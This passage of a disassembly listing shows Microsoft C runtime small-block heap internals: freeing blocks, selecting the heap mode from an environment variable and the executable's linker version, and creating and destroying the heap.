ja short loc_424230
mov edx, [ebp+8]
mov dword_453CEC, edx
mov eax, 1
jmp loc_4242D6
; ---------------------------------------------------------------------------
loc_424230: ; CODE XREF: .text:0042421B�j
xor eax, eax
jmp loc_4242D6
; ---------------------------------------------------------------------------
loc_424237: ; CODE XREF: .text:00424206�j
cmp dword_4F3BEC, 1
jnz loc_4242D4
cmp dword ptr [ebp+8], 0
jbe loc_4242D4
lea eax, [ebp-4]
push eax
call sub_426E90
add esp, 4
mov ecx, [ebp-4]
and ecx, 0FFh
cmp ecx, 6
jl short loc_42429C
cmp dword ptr [ebp+8], 3F8h
ja short loc_42429A
mov edx, [ebp+8]
push edx
call ___sbh_heap_init
add esp, 4
test eax, eax
jz short loc_42429A
mov eax, [ebp+8]
mov dword_4F3C0C, eax
mov dword_4F3BEC, 3
mov eax, 1
jmp short loc_4242D6
; ---------------------------------------------------------------------------
loc_42429A: ; CODE XREF: .text:0042426F�j
; .text:0042427F�j
jmp short loc_4242D4
; ---------------------------------------------------------------------------
loc_42429C: ; CODE XREF: .text:00424266�j
mov ecx, [ebp+8]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+8], ecx
cmp dword ptr [ebp+8], 780h
ja short loc_4242D4
call ___sbh_new_region
test eax, eax
jz short loc_4242D4
mov edx, [ebp+8]
mov dword_453CEC, edx
mov dword_4F3BEC, 2
mov eax, 1
jmp short loc_4242D6
; ---------------------------------------------------------------------------
loc_4242D4: ; CODE XREF: .text:0042423E�j
; .text:00424248�j ...
xor eax, eax
loc_4242D6: ; CODE XREF: .text:004241F3�j
; .text:004241FA�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000062 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000055 BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005F BYTES: COLLAPSED FUNCTION ___sbh_verify_block. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424410 proc near ; CODE XREF: sub_423A90+132�p
; sub_423A90+1B2�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
mov [ebp+var_3C], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_4]
sub eax, [edx+0Ch]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
shr ecx, 0Fh
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
imul edx, 204h
mov eax, [ebp+var_3C]
lea ecx, [eax+edx+144h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
sub edx, 4
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
mov ecx, [eax]
sub ecx, 1
mov [ebp+var_30], ecx
mov edx, [ebp+var_30]
and edx, 1
test edx, edx
jz short loc_42446D
jmp loc_4249E8
; ---------------------------------------------------------------------------
loc_42446D: ; CODE XREF: sub_424410+56�j
mov eax, [ebp+var_1C]
add eax, [ebp+var_30]
mov [ebp+var_38], eax
mov ecx, [ebp+var_38]
mov edx, [ecx]
mov [ebp+var_14], edx
mov eax, [ebp+var_1C]
mov ecx, [eax-4]
mov [ebp+var_C], ecx
mov edx, [ebp+var_14]
and edx, 1
test edx, edx
jnz loc_4245B7
mov eax, [ebp+var_14]
sar eax, 4
sub eax, 1
mov [ebp+var_24], eax
cmp [ebp+var_24], 3Fh
jbe short loc_4244AE
mov [ebp+var_24], 3Fh
loc_4244AE: ; CODE XREF: sub_424410+95�j
mov ecx, [ebp+var_38]
mov edx, [ebp+var_38]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_424590
cmp [ebp+var_24], 20h
jnb short loc_424525
mov edx, 80000000h
mov ecx, [ebp+var_24]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_3C]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_3C]
add edx, [ebp+var_24]
mov [edx+4], cl
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_424523
mov edx, 80000000h
mov ecx, [ebp+var_24]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_424523: ; CODE XREF: sub_424410+F9�j
jmp short loc_424590
; ---------------------------------------------------------------------------
loc_424525: ; CODE XREF: sub_424410+B4�j
mov ecx, [ebp+var_24]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_24]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
mov [eax+4], dl
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_24]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_424590
mov ecx, [ebp+var_24]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_424590: ; CODE XREF: sub_424410+AA�j
; sub_424410:loc_424523�j ...
mov ecx, [ebp+var_38]
mov edx, [ecx+8]
mov eax, [ebp+var_38]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_38]
mov eax, [edx+4]
mov ecx, [ebp+var_38]
mov edx, [ecx+8]
mov [eax+8], edx
mov eax, [ebp+var_30]
add eax, [ebp+var_14]
mov [ebp+var_30], eax
loc_4245B7: ; CODE XREF: sub_424410+7F�j
mov ecx, [ebp+var_30]
sar ecx, 4
sub ecx, 1
mov [ebp+var_28], ecx
cmp [ebp+var_28], 3Fh
jbe short loc_4245D0
mov [ebp+var_28], 3Fh
loc_4245D0: ; CODE XREF: sub_424410+1B7�j
mov edx, [ebp+var_C]
and edx, 1
test edx, edx
jnz loc_424734
mov eax, [ebp+var_1C]
sub eax, [ebp+var_C]
mov [ebp+var_34], eax
mov ecx, [ebp+var_C]
sar ecx, 4
sub ecx, 1
mov [ebp+var_2C], ecx
cmp [ebp+var_2C], 3Fh
jbe short loc_424600
mov [ebp+var_2C], 3Fh
loc_424600: ; CODE XREF: sub_424410+1E7�j
mov edx, [ebp+var_30]
add edx, [ebp+var_C]
mov [ebp+var_30], edx
mov eax, [ebp+var_30]
sar eax, 4
sub eax, 1
mov [ebp+var_28], eax
cmp [ebp+var_28], 3Fh
jbe short loc_424622
mov [ebp+var_28], 3Fh
loc_424622: ; CODE XREF: sub_424410+209�j
mov ecx, [ebp+var_2C]
cmp ecx, [ebp+var_28]
jz loc_42472E
mov edx, [ebp+var_34]
mov eax, [ebp+var_34]
mov ecx, [edx+4]
cmp ecx, [eax+8]
jnz loc_424710
cmp [ebp+var_2C], 20h
jnb short loc_4246A5
mov edx, 80000000h
mov ecx, [ebp+var_2C]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_3C]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_3C]
add edx, [ebp+var_2C]
mov [edx+4], cl
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_4246A3
mov edx, 80000000h
mov ecx, [ebp+var_2C]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_4246A3: ; CODE XREF: sub_424410+279�j
jmp short loc_424710
; ---------------------------------------------------------------------------
loc_4246A5: ; CODE XREF: sub_424410+234�j
mov ecx, [ebp+var_2C]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_2C]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
mov [eax+4], dl
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_2C]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_424710
mov ecx, [ebp+var_2C]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_424710: ; CODE XREF: sub_424410+22A�j
; sub_424410:loc_4246A3�j ...
mov ecx, [ebp+var_34]
mov edx, [ecx+8]
mov eax, [ebp+var_34]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_34]
mov eax, [edx+4]
mov ecx, [ebp+var_34]
mov edx, [ecx+8]
mov [eax+8], edx
loc_42472E: ; CODE XREF: sub_424410+218�j
mov eax, [ebp+var_34]
mov [ebp+var_1C], eax
loc_424734: ; CODE XREF: sub_424410+1C8�j
mov ecx, [ebp+var_C]
and ecx, 1
test ecx, ecx
jnz short loc_42474A
mov edx, [ebp+var_2C]
cmp edx, [ebp+var_28]
jz loc_42485A
loc_42474A: ; CODE XREF: sub_424410+32C�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax*8]
mov [ebp+var_20], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_20]
mov [eax+8], ecx
mov edx, [ebp+var_20]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+var_1C]
mov edx, [ecx+4]
mov eax, [ebp+var_1C]
mov [edx+8], eax
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_1C]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_42485A
cmp [ebp+var_28], 20h
jnb short loc_4247F3
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_28]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov [eax+4], cl
test edx, edx
jnz short loc_4247D1
mov edx, 80000000h
mov ecx, [ebp+var_28]
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_4247D1: ; CODE XREF: sub_424410+3A9�j
mov eax, 80000000h
mov ecx, [ebp+var_28]
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+44h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+44h], ecx
jmp short loc_42485A
; ---------------------------------------------------------------------------
loc_4247F3: ; CODE XREF: sub_424410+386�j
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_28]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov [eax+4], cl
test edx, edx
jnz short loc_424831
mov ecx, [ebp+var_28]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx+4], ecx
loc_424831: ; CODE XREF: sub_424410+404�j
mov ecx, [ebp+var_28]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
loc_42485A: ; CODE XREF: sub_424410+334�j
; sub_424410+37C�j ...
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_30]
mov [ecx], edx
mov eax, [ebp+var_1C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_30]
mov [eax-4], ecx
mov edx, [ebp+var_8]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+var_8]
mov [ecx], eax
mov edx, [ebp+var_8]
cmp dword ptr [edx], 0
jnz loc_4249E8
cmp Dst, 0
jz loc_4249D7
mov eax, dword_4F3BF4
shl eax, 0Fh
mov ecx, Dst
mov edx, [ecx+0Ch]
add edx, eax
mov [ebp+var_18], edx
push 4000h
push 8000h
mov eax, [ebp+var_18]
push eax
call ds:dword_4F54B0 ; VirtualFree
mov edx, 80000000h
mov ecx, dword_4F3BF4
shr edx, cl
mov eax, Dst
mov ecx, [eax+8]
or ecx, edx
mov edx, Dst
mov [edx+8], ecx
mov eax, Dst
mov ecx, [eax+10h]
mov edx, dword_4F3BF4
mov dword ptr [ecx+edx*4+0C4h], 0
mov eax, Dst
mov ecx, [eax+10h]
mov dl, [ecx+43h]
sub dl, 1
mov eax, Dst
mov ecx, [eax+10h]
mov [ecx+43h], dl
mov edx, Dst
mov eax, [edx+10h]
movsx ecx, byte ptr [eax+43h]
test ecx, ecx
jnz short loc_424935
mov edx, Dst
mov eax, [edx+4]
and al, 0FEh
mov ecx, Dst
mov [ecx+4], eax
loc_424935: ; CODE XREF: sub_424410+50F�j
mov edx, Dst
cmp dword ptr [edx+8], 0FFFFFFFFh
jnz loc_4249D7
push 8000h
push 0
mov eax, Dst
mov ecx, [eax+0Ch]
push ecx
call ds:dword_4F54B0 ; VirtualFree
mov edx, Dst
mov eax, [edx+10h]
push eax
push 0
mov ecx, dword_4F3BE8
push ecx
call ds:dword_4F5414 ; RtlFreeHeap
mov edx, dword_4F3C04
imul edx, 14h
mov eax, dword_4F3C08
add eax, edx
mov ecx, Dst
add ecx, 14h
sub eax, ecx
push eax ; Size
mov edx, Dst
add edx, 14h
push edx ; Src
mov eax, Dst
push eax ; Dst
call _memcpy_0
add esp, 0Ch
mov ecx, dword_4F3C04
sub ecx, 1
mov dword_4F3C04, ecx
mov edx, [ebp+arg_0]
cmp edx, Dst
jbe short loc_4249CB
mov eax, [ebp+arg_0]
sub eax, 14h
mov [ebp+arg_0], eax
loc_4249CB: ; CODE XREF: sub_424410+5B0�j
mov ecx, dword_4F3C08
mov dword_4F3BF8, ecx
loc_4249D7: ; CODE XREF: sub_424410+47E�j
; sub_424410+52F�j
mov edx, [ebp+arg_0]
mov Dst, edx
mov eax, [ebp+var_4]
mov dword_4F3BF4, eax
loc_4249E8: ; CODE XREF: sub_424410+58�j
; sub_424410+471�j
mov esp, ebp
pop ebp
retn
sub_424410 endp
; ---------------------------------------------------------------------------
align 10h
; [00000536 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000010F BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001EE BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000005EB BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000130 BYTES: COLLAPSED FUNCTION ___sbh_heapmin. PRESS KEYPAD "+" TO EXPAND]
; [0000061D BYTES: COLLAPSED FUNCTION ___sbh_heap_check. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
mov eax, dword_453CEC
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [0000002B BYTES: COLLAPSED FUNCTION __set_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001DE BYTES: COLLAPSED FUNCTION ___sbh_new_region. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000073 BYTES: COLLAPSED FUNCTION ___sbh_release_region. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000157 BYTES: COLLAPSED FUNCTION ___sbh_decommit_pages. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000090 BYTES: COLLAPSED FUNCTION ___sbh_find_block_0. PRESS KEYPAD "+" TO EXPAND]
; [0000006C BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000003B8 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000002A9 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block_from_page. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000164 BYTES: COLLAPSED FUNCTION ___sbh_resize_block_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000237 BYTES: COLLAPSED FUNCTION ___sbh_heap_check_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426E90 proc near ; CODE XREF: .text:00424252�p
; sub_426EF0+1FB�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
mov dword ptr [eax], 0
push 0
call ds:dword_4F5370 ; GetModuleHandleA
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
xor edx, edx
mov dx, [ecx]
cmp edx, 5A4Dh
jnz short loc_426EC3
mov eax, [ebp+var_8]
cmp dword ptr [eax+3Ch], 0
jnz short loc_426EC5
loc_426EC3: ; CODE XREF: sub_426E90+28�j
jmp short loc_426EE8
; ---------------------------------------------------------------------------
loc_426EC5: ; CODE XREF: sub_426E90+31�j
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
add edx, [ecx+3Ch]
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov dl, [ecx+1Ah]
mov [eax], dl
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov dl, [ecx+1Bh]
mov [eax+1], dl
loc_426EE8: ; CODE XREF: sub_426E90:loc_426EC3�j
mov esp, ebp
pop ebp
retn
sub_426E90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426EF0 proc near ; CODE XREF: sub_427120:loc_42714C�p
Str = dword ptr -1238h
var_1234 = dword ptr -1234h
var_1230 = dword ptr -1230h
SubStr = byte ptr -122Ch
Str2 = byte ptr -1128h
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 1238h
call __alloca_probe
mov [ebp+Str], 0
mov [ebp+var_98], 94h
lea eax, [ebp+var_98]
push eax
call ds:dword_4F539C ; GetVersionExA
test eax, eax
jz short loc_426F3E
cmp [ebp+var_88], 2
jnz short loc_426F3E
cmp [ebp+var_94], 5
jb short loc_426F3E
mov eax, 1
jmp loc_427110
; ---------------------------------------------------------------------------
loc_426F3E: ; CODE XREF: sub_426EF0+30�j
; sub_426EF0+39�j ...
push 1090h
lea ecx, [ebp+Str2]
push ecx
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call ds:dword_4F54B8 ; GetEnvironmentVariableA
test eax, eax
jz loc_4270E4
lea edx, [ebp+Str2]
mov [ebp+var_4], edx
jmp short loc_426F71
; ---------------------------------------------------------------------------
loc_426F68: ; CODE XREF: sub_426EF0:loc_426F9E�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_426F71: ; CODE XREF: sub_426EF0+76�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_426FA0
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 61h
jl short loc_426F9E
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 7Ah
jg short loc_426F9E
mov ecx, [ebp+var_4]
mov dl, [ecx]
add dl, 0E0h
mov eax, [ebp+var_4]
mov [eax], dl
loc_426F9E: ; CODE XREF: sub_426EF0+94�j
; sub_426EF0+9F�j
jmp short loc_426F68
; ---------------------------------------------------------------------------
loc_426FA0: ; CODE XREF: sub_426EF0+89�j
push 16h ; MaxCount
lea ecx, [ebp+Str2]
push ecx ; Str2
push offset Str1 ; "__GLOBAL_HEAP_SELECTED"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_426FC8
lea edx, [ebp+Str2]
mov [ebp+Str], edx
jmp short loc_42703B
; ---------------------------------------------------------------------------
loc_426FC8: ; CODE XREF: sub_426EF0+C8�j
push 104h
lea eax, [ebp+SubStr]
push eax
push 0
call ds:dword_4F5344 ; GetModuleFileNameA
lea ecx, [ebp+SubStr]
mov [ebp+var_4], ecx
jmp short loc_426FF0
; ---------------------------------------------------------------------------
loc_426FE7: ; CODE XREF: sub_426EF0:loc_42701D�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_426FF0: ; CODE XREF: sub_426EF0+F5�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_42701F
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 61h
jl short loc_42701D
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 7Ah
jg short loc_42701D
mov eax, [ebp+var_4]
mov cl, [eax]
add cl, 0E0h
mov edx, [ebp+var_4]
mov [edx], cl
loc_42701D: ; CODE XREF: sub_426EF0+113�j
; sub_426EF0+11E�j
jmp short loc_426FE7
; ---------------------------------------------------------------------------
loc_42701F: ; CODE XREF: sub_426EF0+108�j
lea eax, [ebp+SubStr]
push eax ; SubStr
lea ecx, [ebp+Str2]
push ecx ; Str
call _strstr
add esp, 8
mov [ebp+Str], eax
loc_42703B: ; CODE XREF: sub_426EF0+D6�j
cmp [ebp+Str], 0
jz loc_4270E4
push 2Ch ; Val
mov edx, [ebp+Str]
push edx ; Str
call _strchr
add esp, 8
mov [ebp+Str], eax
cmp [ebp+Str], 0
jz short loc_4270E4
mov eax, [ebp+Str]
add eax, 1
mov [ebp+Str], eax
mov ecx, [ebp+Str]
mov [ebp+var_4], ecx
loc_427080: ; CODE XREF: sub_426EF0:loc_4270A6�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_4270A8
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 3Bh
jnz short loc_42709D
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
jmp short loc_4270A6
; ---------------------------------------------------------------------------
loc_42709D: ; CODE XREF: sub_426EF0+1A3�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_4270A6: ; CODE XREF: sub_426EF0+1AB�j
jmp short loc_427080
; ---------------------------------------------------------------------------
loc_4270A8: ; CODE XREF: sub_426EF0+198�j
push 0Ah ; Radix
push 0 ; EndPtr
mov edx, [ebp+Str]
push edx ; Str
call _strtol
add esp, 0Ch
mov [ebp+var_1230], eax
cmp [ebp+var_1230], 2
jz short loc_4270DC
cmp [ebp+var_1230], 3
jz short loc_4270DC
cmp [ebp+var_1230], 1
jnz short loc_4270E4
loc_4270DC: ; CODE XREF: sub_426EF0+1D8�j
; sub_426EF0+1E1�j
mov eax, [ebp+var_1230]
jmp short loc_427110
; ---------------------------------------------------------------------------
loc_4270E4: ; CODE XREF: sub_426EF0+67�j
; sub_426EF0+152�j ...
lea eax, [ebp+var_1234]
push eax
call sub_426E90
add esp, 4
mov ecx, [ebp+var_1234]
and ecx, 0FFh
cmp ecx, 6
jl short loc_42710B
mov eax, 3
jmp short loc_427110
; ---------------------------------------------------------------------------
loc_42710B: ; CODE XREF: sub_426EF0+212�j
mov eax, 2
loc_427110: ; CODE XREF: sub_426EF0+49�j
; sub_426EF0+1F2�j ...
mov esp, ebp
pop ebp
retn
sub_426EF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427120 proc near ; CODE XREF: start+7E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push 1000h
xor eax, eax
cmp [ebp+arg_0], 0
setz al
push eax
call ds:dword_4F54C0 ; HeapCreate
mov dword_4F3BE8, eax
cmp dword_4F3BE8, 0
jnz short loc_42714C
xor eax, eax
jmp short loc_4271AB
; ---------------------------------------------------------------------------
loc_42714C: ; CODE XREF: sub_427120+26�j
call sub_426EF0
mov dword_4F3BEC, eax
cmp dword_4F3BEC, 3
jnz short loc_427183
push 3F8h
call ___sbh_heap_init
add esp, 4
test eax, eax
jnz short loc_427181
mov ecx, dword_4F3BE8
push ecx
call ds:dword_4F54BC ; HeapDestroy
xor eax, eax
jmp short loc_4271AB
; ---------------------------------------------------------------------------
loc_427181: ; CODE XREF: sub_427120+4E�j
jmp short loc_4271A6
; ---------------------------------------------------------------------------
loc_427183: ; CODE XREF: sub_427120+3D�j
cmp dword_4F3BEC, 2
jnz short loc_4271A6
call ___sbh_new_region
test eax, eax
jnz short loc_4271A6
mov edx, dword_4F3BE8
push edx
call ds:dword_4F54BC ; HeapDestroy
xor eax, eax
jmp short loc_4271AB
; ---------------------------------------------------------------------------
loc_4271A6: ; CODE XREF: sub_427120:loc_427181�j
; sub_427120+6A�j ...
mov eax, 1
loc_4271AB: ; CODE XREF: sub_427120+2A�j
; sub_427120+5F�j ...
pop ebp
retn
sub_427120 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp dword_4F3BEC, 3
jnz loc_42724A
mov eax, dword_4F3C08
mov [ebp-8], eax
mov dword ptr [ebp-4], 0
jmp short loc_4271DD
; ---------------------------------------------------------------------------
loc_4271D4: ; CODE XREF: .text:00427231�j
mov ecx, [ebp-4]
add ecx, 1
mov [ebp-4], ecx
loc_4271DD: ; CODE XREF: .text:004271D2�j
mov edx, [ebp-4]
cmp edx, dword_4F3C04
jge short loc_427233
push 4000h
push 100000h
mov eax, [ebp-8]
mov ecx, [eax+0Ch]
push ecx
call ds:dword_4F54B0 ; VirtualFree
push 8000h
push 0
mov edx, [ebp-8]
mov eax, [edx+0Ch]
push eax
call ds:dword_4F54B0 ; VirtualFree
mov ecx, [ebp-8]
mov edx, [ecx+10h]
push edx
push 0
mov eax, dword_4F3BE8
push eax
call ds:dword_4F5414 ; RtlFreeHeap
mov ecx, [ebp-8]
add ecx, 14h
mov [ebp-8], ecx
jmp short loc_4271D4
; ---------------------------------------------------------------------------
loc_427233: ; CODE XREF: .text:004271E6�j
mov edx, dword_4F3C08
push edx
push 0
mov eax, dword_4F3BE8
push eax
call ds:dword_4F5414 ; RtlFreeHeap
jmp short loc_427288
; ---------------------------------------------------------------------------
loc_42724A: ; CODE XREF: .text:004271BD�j
cmp dword_4F3BEC, 2
jnz short loc_427288
mov dword ptr [ebp-0Ch], offset off_451CC8
loc_42725A: ; CODE XREF: .text:00427286�j
mov ecx, [ebp-0Ch]
cmp dword ptr [ecx+10h], 0
jz short loc_427277
push 8000h
push 0
mov edx, [ebp-0Ch]
mov eax, [edx+10h]
push eax
call ds:dword_4F54B0 ; VirtualFree
loc_427277: ; CODE XREF: .text:00427261�j
mov ecx, [ebp-0Ch]
mov edx, [ecx]
mov [ebp-0Ch], edx
cmp dword ptr [ebp-0Ch], offset off_451CC8
jnz short loc_42725A
loc_427288: ; CODE XREF: .text:00427248�j
; .text:00427251�j
mov eax, dword_4F3BE8
push eax
call ds:dword_4F54BC ; HeapDestroy
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [000000B7 BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001E4 BYTES: COLLAPSED FUNCTION __filbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION __read. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000445 BYTES: COLLAPSED FUNCTION __read_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000031D BYTES: COLLAPSED FUNCTION __openfile. PRESS KEYPAD "+" TO EXPAND]
off_427D4D dd offset loc_427B7B ; DATA XREF: __openfile+144�r
dd offset loc_427CA6
dd offset loc_427C65
dd offset loc_427C44
dd offset loc_427C86
dd offset loc_427BB5
dd offset loc_427BFC
dd offset loc_427C20
dd offset loc_427BD9
dd offset loc_427CC3
byte_427D75 db 0 ; DATA XREF: __openfile+13E�r
dw 909h
dd 5 dup(9090909h), 9010909h, 3 dup(9090909h), 9040302h
